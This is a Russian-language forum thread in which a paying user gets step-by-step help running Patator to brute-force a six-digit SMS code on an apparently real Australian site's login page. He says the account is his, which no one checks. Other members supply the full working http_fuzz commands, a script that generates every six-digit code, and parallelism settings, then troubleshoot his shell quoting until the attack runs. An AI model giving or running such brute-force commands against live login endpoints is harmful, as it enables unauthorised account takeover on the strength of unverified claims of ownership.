нужна помощь в настройке программы Patator

[billipermi]

нуждаюсь в помощи в настройке программы Patator (возможны другие варианты) так как простой скрипт Пайтон на перебор пароля (6 цифр) занял у меня 9 часов. Тема белая, действия надо производить в личном кабинете (доступ представлю), надо подобрать пароль из 6 цифр посланный на на номер телефона (Австралия) от которого я потерял (ограничен в доступе, остался только слабый интернет) по причине отсутствия больше года на территории Австралии
Пататор вроде работает, но я не могу создать скрипт где body одно поле, те скрипты что нашел в интернете рассчитаны на body с двумя полями usermane и password, и вторая проблема создать словарь.
Ребятушки помогите - заплачу 2000 рублей, за настройку программы и за обучение

 

[Koloboking]

Пример использования Patator с одним полем​

Допустим, что у вас есть URL для отправки запроса, например,

Ссылка скрыта от гостей

, и в теле запроса вам нужно отправить только поле password.

patator http_fuzz url=https://example.com/login method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid'

В этом примере wordlist.txt – это файл словаря, который мы создадим, а ignore:fgrep='Invalid' – это строка, которую мы будем игнорировать в ответе сервера, указывающая на неправильный пароль.

Создание словаря для перебора шестизначных чисел​

Python для генерации файла словаря:

with open("wordlist.txt", "w") as f:
    for i in range(1000000):
        f.write(f"{i:06d}\n")

Этот скрипт создаст файл wordlist.txt, который будет содержать все возможные шестизначные комбинации чисел от 000000 до 999999.
Вы можете настроить дополнительные параметры для Patator, например, количество одновременных запросов:

patator http_fuzz url=https://example.com/login method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid' -t 10

Параметр -t 10 указывает на выполнение 10 параллельных запросов одновременно или так если логин вообще не нужен:

patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid'

 

[billipermi]

Пример использования Patator с одним полем​

Допустим, что у вас есть URL для отправки запроса, например,

Ссылка скрыта от гостей

, и в теле запроса вам нужно отправить только поле password.

patator http_fuzz url=https://example.com/login method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid'

В этом примере wordlist.txt – это файл словаря, который мы создадим, а ignore:fgrep='Invalid' – это строка, которую мы будем игнорировать в ответе сервера, указывающая на неправильный пароль.

Создание словаря для перебора шестизначных чисел​

Python для генерации файла словаря:

with open("wordlist.txt", "w") as f:
    for i in range(1000000):
        f.write(f"{i:06d}\n")

Этот скрипт создаст файл wordlist.txt, который будет содержать все возможные шестизначные комбинации чисел от 000000 до 999999.
Вы можете настроить дополнительные параметры для Patator, например, количество одновременных запросов:

patator http_fuzz url=https://example.com/login method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid' -t 10

Параметр -t 10 указывает на выполнение 10 параллельных запросов одновременно или так если логин вообще не нужен:

patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=wordlist.txt -x ignore:fgrep='Invalid'

ошибка 0=wordlist.txt команда не найдена, хотя этот файл по всему компютеру раскидал

 

[Koloboking]

ошибка 0=wordlist.txt команда не найдена, хотя этот файл по всему компютеру раскидал

Убедитесь, что файл wordlist.txt находится в правильном месте или укажите полный путь к этому файлу. Например:
0=/path/to/wordlist.txt
проверьте правильность команды пример корректной:

patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=/path/to/wordlist.txt -x ignore:fgrep='Invalid'

пример команды с прверкой пути:

patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=/path/to/wordlist.txt -x ignore:fgrep='Invalid'

/path/to/wordlist.txt - /path/to/ нужно заменить на ваш путь

 

[billipermi]

Убедитесь, что файл wordlist.txt находится в правильном месте или укажите полный путь к этому файлу. Например:
0=/path/to/wordlist.txt
проверьте правильность команды пример корректной:

patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=/path/to/wordlist.txt -x ignore:fgrep='Invalid'

пример команды с прверкой пути:

patator http_fuzz url=https://example.com/submit method=POST body='password=FILE0' 0=/path/to/wordlist.txt -x ignore:fgrep='Invalid'

/path/to/wordlist.txt - /path/to/ нужно заменить на ваш путь

 

[billipermi]

что я делаю неправильно ?????

 

[larchik]

что я делаю неправильно ?????

покажите скрин или фото с выводом ошибки

 

[billipermi]

покажите скрин или фото с выводом ошибки

 

[billipermi]

вот 2 фото лучше

 

[Koloboking]

что я делаю неправильно ?????

patator http_fuzz url="http://www.putrike.com/WebResources/accounts/login" method=POST body='password=FILE0' 0=/home/liza/wordlist.txt -x ignore:fgrep='Invalid'

Убедитесь, что:

• Файл wordlist.txt действительно существует в каталоге /home/liza/.
• У вас есть доступ к этому файлу.

Проверка существования файла​

Вы можете выполнить команду ls, чтобы проверить, существует ли файл:

ls /home/liza/wordlist.txt

проверьте права доступа к файлу и убедитесь, что ваш пользователь имеет права на чтение этого файла.

 

[billipermi]

patator http_fuzz url="http://www.putrike.com/WebResources/accounts/login" method=POST body='password=FILE0' 0=/home/liza/wordlist.txt -x ignore:fgrep='Invalid'

Убедитесь, что:

• Файл wordlist.txt действительно существует в каталоге /home/liza/.
• У вас есть доступ к этому файлу.

Проверка существования файла​

Вы можете выполнить команду ls, чтобы проверить, существует ли файл:

ls /home/liza/wordlist.txt

проверьте права доступа к файлу и убедитесь, что ваш пользователь имеет права на чтение этого файла.

вот

 

[Koloboking]

вот

можно как то увидеть что у Вас в консоли происходит полностью?

# Установка зависимости
pip3 install requests

# Запуск команды Patator
patator http_fuzz url="https://www.purkle.com.au/WebResources/accounts/login" method=POST body='password=FILE0' 0=/home/liza/wordlist.txt -x ignore:fgrep='Invalid'

 

[billipermi]

можно как то увидеть что у Вас в консоли происходит полностью?

у меня русскоязчная версия линукса, я установил пататор и все действия совершаю в терминале с правами администратора. Извините а консоль это не терминал?
вот снимок на текущий момент

 

[Koloboking]

у меня русскоязчная версия линукса, я установил пататор и все действия совершаю в терминале с правами администратора. Извините а консоль это не терминал?

терминал - все верно, обычно patator не требует прав администратора - проверьте все зависимости

 

[larchik]

0=/home/liza/wordlist.txt

может быть путь до файла стоит взять в кавычки (двойные или одинарные), url тоже возьмите в кавычки. Скорее всего в нем есть символы, которые интерпретируются bash

 

[billipermi]

может быть путь до файла стоит взять в кавычки (двойные или одинарные), url тоже возьмите в кавычки. Скорее всего в нем есть символы, которые интерпретируются bash

не проходит. может судьба у меня такая. хочется плюнуть на эту программу. ПОСОВЕТУЙТЕ НА КАКОЙ ЕЩЕ ПРОГРАММЕ ПОТРЕНИРОВАТСЯ????
ЧТОБЫ БЫСТРО ПЕРЕИБИРАЛА ПАРОЛИ И БЫЛА ДРУЖЕЛЮБНОЙ

 

[Koloboking]

не проходит. может судьба у меня такая. хочется плюнуть на эту программу. ПОСОВЕТУЙТЕ НА КАКОЙ ЕЩЕ ПРОГРАММЕ ПОТРЕНИРОВАТСЯ????
ЧТОБЫ БЫСТРО ПЕРЕИБИРАЛА ПАРОЛИ И БЫЛА ДРУЖЕЛЮБНОЙ

patator http_fuzz url="https://www.purkle.com.au/WebResources/accounts/login" method=POST body='password=FILE0' 0='/home/liza/wordlist.txt' -x ignore:fgrep='Invalid'

попробуйте, но если вы копипастите не понимая что и зачем вы делаете то вряд ли вы найдете дружелюбную программу.

 

[larchik]

не проходит. может судьба у меня такая. хочется плюнуть на эту программу. ПОСОВЕТУЙТЕ НА КАКОЙ ЕЩЕ ПРОГРАММЕ ПОТРЕНИРОВАТСЯ????
ЧТОБЫ БЫСТРО ПЕРЕИБИРАЛА ПАРОЛИ И БЫЛА ДРУЖЕЛЮБНОЙ

по фотке видно, что в url есть символ &, вероятно он и является причиной ошибки в конечном счете. Поэтому надо вять его (url) весь в кавычки.
Кроме того я там вижу слово resolve - откуда оно там?
И что было перед выполнением этой команды?
Отвечу за вас. Перед этой командной, которую частично видно на фото, была выполнена команда patator http_fuzz url=... влоть до символа &, затем она завершилась ошибкой, так как часть команды после символа & не выполнилась и далее все пошло крахом ) Bash попытался интерпретировать вторую часть команды, как отдельную операцию и споткнулся на 0=/home/liza...

Желательно приложить нормальную фотку всего терминала целиком, приватные данные можно (нужно) замазать

 

[Koloboking]

не проходит. может судьба у меня такая. хочется плюнуть на эту программу. ПОСОВЕТУЙТЕ НА КАКОЙ ЕЩЕ ПРОГРАММЕ ПОТРЕНИРОВАТСЯ????
ЧТОБЫ БЫСТРО ПЕРЕИБИРАЛА ПАРОЛИ И БЫЛА ДРУЖЕЛЮБНОЙ

добавлю что если копипастите то хотя бы проверяйте пробелы и кавычки

 

[billipermi]

добавлю что если копипастите то хотя бы проверяйте пробелы и кавычки

РЕБЯТУШКИ ЛЕД ТРОНУЛСЯ,КАВЫЧКИ ПЕРЕД УРЛОМ СРАБОТАЛИ. ПОШЕЛ ПЕРЕБОР. ПО РЕЗУЛЬТАТАМ ОТПИШУСЬ ПО ПОЗЖЕ